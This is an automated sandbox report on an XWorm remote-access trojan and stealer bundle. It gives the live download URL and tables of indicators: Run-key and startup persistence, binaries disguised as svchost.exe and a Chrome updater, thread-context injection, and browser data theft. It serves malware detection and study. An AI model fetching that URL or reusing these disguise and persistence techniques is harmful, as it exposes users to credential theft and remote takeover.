Malware Analysis Report

2024-11-13 16:15

Sample ID 240411-qsmlbsff4v
Target https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip
Tags
xworm agilenet persistence rat spyware stealer trojan
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

Threat Level: Known bad

The file https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip was found to be: Known bad.

Malicious Activity Summary

xworm agilenet persistence rat spyware stealer trojan

Detect Xworm Payload

Xworm

Blocklisted process makes network request

Modifies Installed Components in the registry

Loads dropped DLL

Obfuscated with Agile.Net obfuscator

Reads user/profile data of web browsers

Drops startup file

Executes dropped EXE

Enumerates connected drives

Adds Run key to start application

Legitimate hosting services abused for malware hosting/C2

Looks up external IP address via web service

Suspicious use of SetThreadContext

Drops file in System32 directory

Enumerates physical storage devices

Modifies registry key

Suspicious use of AdjustPrivilegeToken

Checks SCSI registry key(s)

Modifies Internet Explorer settings

Uses Volume Shadow Copy service COM API

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: AddClipboardFormatListener

Enumerates system info in registry

Enumerates processes with tasklist

Suspicious use of WriteProcessMemory

Uses Volume Shadow Copy WMI provider

Suspicious use of SetWindowsHookEx

Suspicious use of FindShellTrayWindow

Suspicious use of SendNotifyMessage

Creates scheduled task(s)

Kills process with taskkill

Modifies data under HKEY_USERS

NTFS ADS

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Uses Task Scheduler COM API

Modifies registry class

Delays execution with timeout.exe

Suspicious behavior: GetForegroundWindowSpam

Checks processor information in registry

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-04-11 13:31

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-04-11 13:31

Reported

2024-04-11 13:58

Platform

win11-20240214-en

Max time kernel

1588s

Max time network

1590s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --single-argument https://moonreborn.com/attachments/steal_31.03.24_v2.20.zip

Signatures

Detect Xworm Payload

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A

Xworm

trojan rat xworm

Modifies Installed Components in the registry

persistence
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Active Setup\Installed Components C:\Windows\explorer.exe N/A

Drops startup file

Description Indicator Process Target
File created C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\AppData\Roaming\svchost.exe N/A
File opened for modification C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\svchost.lnk C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\XWorm V3.1.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Pictures\b3ownddosser.exe N/A
N/A N/A C:\Users\Admin\Pictures\b3ownddosser.exe N/A
N/A N/A C:\Users\Admin\Pictures\b3ownddosser.exe N/A
N/A N/A C:\Users\Admin\Pictures\b3ownddosser.exe N/A
N/A N/A C:\Users\Admin\Pictures\b3ownddosser.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\AppData\Local\Temp\Command Reciever.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A
N/A N/A C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Obfuscated with Agile.Net obfuscator

agilenet
Description Indicator Process Target
N/A N/A N/A N/A

Reads user/profile data of web browsers

spyware stealer

Adds Run key to start application

persistence
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" C:\Users\Admin\Pictures\b3ownddosser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" C:\Users\Admin\Pictures\b3ownddosser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" C:\Users\Admin\Pictures\b3ownddosser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" C:\Users\Admin\Pictures\b3ownddosser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\b3ownddosser = "C:\\Users\\Admin\\Pictures\\b3ownddosser.exe" C:\Users\Admin\Pictures\b3ownddosser.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\ChromeUpdater = "C:\\Users\\Admin\\AppData\\Roaming\\GoogleChromeUpdateLogger\\Update.exe" C:\Windows\system32\reg.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Windows\CurrentVersion\Run\svchost = "C:\\Users\\Admin\\AppData\\Roaming\\svchost.exe" C:\Users\Admin\AppData\Roaming\svchost.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\D: C:\Windows\explorer.exe N/A
File opened (read-only) \??\F: C:\Windows\explorer.exe N/A
File opened (read-only) \??\D: C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
File opened (read-only) \??\F: C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A

Legitimate hosting services abused for malware hosting/C2

Description Indicator Process Target
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A camo.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A
N/A raw.githubusercontent.com N/A N/A

Looks up external IP address via web service

Description Indicator Process Target
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A
N/A ip-api.com N/A N/A

Drops file in System32 directory

Description Indicator Process Target
File created C:\Windows\system32\perfc009.dat C:\Windows\system32\lodctr.exe N/A
File created C:\Windows\system32\perfh009.dat C:\Windows\system32\lodctr.exe N/A

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 2840 set thread context of 2952 N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 5192 set thread context of 3540 N/A C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 7128 set thread context of 800 N/A C:\Users\Admin\Downloads\XWorm-Remote-Access-Tool-main\XWorm-Remote-Access-Tool-main\XWorm.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe
PID 7000 set thread context of 4800 N/A C:\Users\Admin\Pictures\b3ownddosser.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 6180 set thread context of 4856 N/A C:\Users\Admin\Pictures\b3ownddosser.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 2728 set thread context of 5196 N/A C:\Users\Admin\Pictures\b3ownddosser.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 4928 set thread context of 3288 N/A C:\Users\Admin\Pictures\b3ownddosser.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 1920 set thread context of 6152 N/A C:\Users\Admin\Pictures\b3ownddosser.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 3508 set thread context of 2776 N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
PID 6448 set thread context of 6300 N/A C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC-Client.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe

Enumerates physical storage devices

Checks SCSI registry key(s)

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{8c7ed206-3f8a-4827-b3ab-ae9e1faefc6c}\0002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\ConfigFlags C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0003 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\Disk&Ven_DADY&Prod_HARDDISK\4&215468a5&0&000000\ConfigFlags C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{a45c254e-df1c-4efd-8020-67d146a850e0}\0011 C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_DADY&Prod_DADY_DVD-ROM\4&215468a5&0&010000\Properties\{51236583-0c4a-4fe8-b81f-166aec13f510}\0064 C:\Windows\explorer.exe N/A
Key value queried \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000001\Capabilities C:\Windows\explorer.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI\CdRom&Ven_Msft&Prod_Virtual_DVD-ROM\2&1f4adffe&0&000002\Properties\{afd97640-86a3-4210-b67c-289c41aabe55}\0002 C:\Windows\explorer.exe N/A

Checks processor information in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~MHz C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\Description\System\CentralProcessor\0 C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Identifier C:\Users\Admin\AppData\Roaming\GoogleChromeUpdateLogger\Update.exe N/A

Creates scheduled task(s)

persistence
Description Indicator Process Target
N/A N/A C:\Windows\System32\schtasks.exe N/A

Delays execution with timeout.exe

evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A
N/A N/A C:\Windows\system32\timeout.exe N/A

Enumerates processes with tasklist

Description Indicator Process Target
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A
N/A N/A C:\Windows\system32\tasklist.exe N/A

Enumerates system info in registry

Description Indicator Process Target
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies Internet Explorer settings

adware spyware
Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch C:\Windows\explorer.exe N/A
Set value (str) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\WindowsSearch\Version = "WS not running" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\SOFTWARE\Microsoft\Internet Explorer\Main\FeatureControl\FEATURE_BROWSER_EMULATION C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\AcroRd32.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\Locked = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser C:\Windows\explorer.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000\Software\Microsoft\Internet Explorer\Main\DisableFirstRunCustomize = "1" C:\Windows\explorer.exe N/A

Modifies data under HKEY_USERS

Description Indicator Process Target
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry\TraceTimeLast = "133573161416536741" C:\Program Files\Google\Chrome\Application\chrome.exe N/A
Key created \REGISTRY\USER\S-1-5-19\Software\Microsoft\Cryptography\TPM\Telemetry C:\Program Files\Google\Chrome\Application\chrome.exe N/A

Modifies registry class

Description Indicator Process Target
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "4" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239}\FFlags = "1" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (data) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 = 14001f80cb859f6720028040b29b5540cc05aab60000 C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupView = "4294967295" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7} C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\16\ComDlg\{885A186E-A440-4ADA-812B-DB871B942259}\GroupByDirection = "4294967295" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\29\Shell\{24CCB8A6-C45A-477D-B940-3382B9225668}\GroupByDirection = "1" C:\Windows\explorer.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\0\0\1\0\0 C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\Shell C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\MuiCache C:\Windows\SystemApps\MicrosoftWindows.Client.CBS_cw5n1h2txyewy\MiniSearchHost.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\28\ComDlg\{B3690E58-E961-423B-B687-386EBFD83239} C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
Key created \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings C:\Windows\explorer.exe N/A
Set value (int) \REGISTRY\USER\S-1-5-21-2567984660-2719943099-2683635618-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\5\ComDlg\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" C:\Users\Admin\Downloads\XWorm-RAT-V2.1-main\XWorm-RAT-V2.1-main\XWorm RAT V2.1\XHVNC.exe N/A
